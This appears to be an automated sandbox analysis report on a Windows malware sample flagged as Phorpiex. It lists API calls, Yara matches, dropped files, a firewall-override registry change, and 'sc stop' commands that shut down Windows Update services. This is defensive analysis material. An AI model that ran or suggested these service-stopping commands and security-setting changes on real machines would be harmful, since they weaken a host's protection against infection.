Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Users\user\Desktop\T52Z708x2p.exe

Code function: 1_2_0000000140055604 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_0000000140055604

Source: C:\Users\user\Desktop\T52Z708x2p.exe

Code function: 1_2_00000001400441B0 _Init_thread_header,GetVersionExW,GetNativeSystemInfo,GetModuleHandleW,GetProcAddress,

1_2_00000001400441B0

Source: C:\Windows\System32\dwm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\sysppvrdnvs.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center FirewallOverride

Jump to behavior

Stops critical windows services

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait

Remote Access Functionality

Yara detected Phorpiex

Source: Yara match	File source: 35.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.1706633239.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.446629599.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.1706633239.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.0.446629599.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1484456893.000000000053E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.1949731068.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2627233365.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2090805387.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1966173412.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000000.2069869412.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.1450900740.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.1976145001.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1473803939.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.1588390233.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1986636602.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000000.2150937536.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1986738654.000000000057E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1706633239.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 7612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 4236, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 446629599.exe PID: 4260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 7404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 7840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysppvrdnvs.exe PID: 5948, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\sysppvrdnvs.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\newtpp[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\446629599.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1706633239.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,	5_2_00401470
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,	5_2_00402020
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,	5_2_0040E190
Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_004013B0 CreateEventA,socket,bind,CreateThread,	5_2_004013B0
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,	6_2_00401470
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,	6_2_00402020
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_0040E190 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,	6_2_0040E190
